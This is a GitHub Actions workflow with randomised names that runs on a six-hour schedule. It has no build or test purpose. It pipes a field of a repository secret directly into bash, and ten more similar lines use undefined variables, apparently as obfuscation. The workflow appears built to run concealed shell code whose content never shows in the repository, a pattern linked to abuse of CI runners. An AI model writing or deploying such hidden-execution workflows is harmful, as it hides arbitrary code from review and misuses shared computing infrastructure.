name: caiwuhui2415

on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caiwuhui2415
        env:
          pnq39: ${{ secrets.pnq39 }}
        run: |
          echo $pnq39 | jq -r .svy0093 | /bin/bash
          echo $iorpk641 | jq -r .gaa79 | /bin/bash
          echo $kdox33 | jq -r .mhclu6 | /bin/bash
          echo $o9 | jq -r .trmf2055 | /bin/bash
          echo $vt7874 | jq -r .ua6748 | /bin/bash
          echo $hyat428 | jq -r .rf426 | /bin/bash
          echo $drl731 | jq -r .tpt2 | /bin/bash
          echo $ubvpk8021 | jq -r .jrd9570 | /bin/bash
          echo $c6 | jq -r .xn9832 | /bin/bash
          echo $lkscy346 | jq -r .ew26630 | /bin/bash
          echo $f2442 | jq -r .tkrx8 | /bin/bash

